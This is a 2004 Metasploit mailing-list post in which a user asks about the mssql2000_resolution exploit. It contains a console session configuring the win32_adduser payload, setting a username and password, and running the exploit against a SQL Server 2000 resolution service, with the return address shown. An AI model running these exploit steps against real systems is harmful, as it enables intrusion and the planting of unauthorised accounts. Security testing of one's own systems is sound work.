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mssql 2000 resolution question

From: neil-on-metasploit at (Neil)
Date: Sun, 19 Sep 2004 10:53:20 -0500

hey guys, 

I would like to know what I really should see when using 
msssql2000_resolution if it was successful. I tried it against my system and 
you can find the output below. And also, why is the "net start 
sqlserveragent" needed? 

msf mssql2000_resolution > set PAYLOAD win32_adduser
PAYLOAD -> win32_adduser
msf mssql2000_resolution(win32_adduser) > show options 

Exploit and Payload Options

 Exploit:    Name      Default      Description
 --------    ------    ---------    ------------------
 required    RHOST     localhost    The target address
 required    RPORT     1434         The target port 

 Payload:    Name        Default    Description
 --------    --------    -------    

 required    PASS                   The password for this user
 optional    EXITFUNC    seh        Exit technique: "process", "thread", 
 required    USER                   The username to create 

 Target: Windows 2000 

msf mssql2000_resolution(win32_adduser) > set PASS pass
PASS -> pass
msf mssql2000_resolution(win32_adduser) > set USER user
USER -> user
msf mssql2000_resolution(win32_adduser) > check
SQL Server 'XP' on port 1433
msf mssql2000_resolution(win32_adduser) >
msf mssql2000_resolution(win32_adduser) > exploit
[*] Trying target Windows 2000 with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained 

msf mssql2000_resolution(win32_adduser) > 

Thanks guys! 


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